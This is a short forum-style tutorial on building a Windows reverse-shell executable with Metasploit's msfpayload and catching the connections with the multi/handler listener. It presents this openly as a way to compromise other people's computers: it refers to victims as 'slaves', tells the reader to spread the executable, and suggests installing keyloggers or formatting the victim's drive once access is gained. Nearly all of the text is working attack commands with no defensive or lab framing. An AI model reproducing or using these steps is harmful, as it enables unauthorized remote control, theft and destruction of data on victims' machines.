The foundation of hacking, obtaining access to your slave.
Todays lesson will be covering the payload 'shell_reverse_tcp' a basic but very powerful payload.
Alright lets get started!
Lets start off with configuring the payload.
PHP:
msfpayload windows/shell_reverse_tcp O
Then insert the host(your ip) and port(must be forwarded)
PHP:
msfpayload windows/shell_reverse_tcp LHOST=YOURIP LPORT=APORTTHATISOPEN O
Now to generate a exe that you can spread and use to gain access to peoples computers.
PHP:
msfpayload windows/shell_reverse_tcp LHOST=YOURIP LPORT=APORTTHATISOPEN X > /home/reverseTcp.exe
Good job, you've configured your payload! Now to listen in and exploit there computer.
Open a new terminal and start up Metasploit 'msfconsole'
Then startup the exploit handler.
PHP:
use exploit/multi/handler
Now tell the handler to look out for your reverse shell.
PHP:
set payload windows/shell/reverse_tcp
You're almost done, now to tell the handler to listen in for connections.
PHP:
set LHOST put.your.ip.here
PHP:
set LPORT openport
All that's left to do is run your script and wait for someone to run your exploit.
PHP:
exploit
When you get someone, there command prompt will appear in the terminal and from there you can do ANYTHING, enable remote desktop, upload keylogger scripts, format there c:\ drive, anything...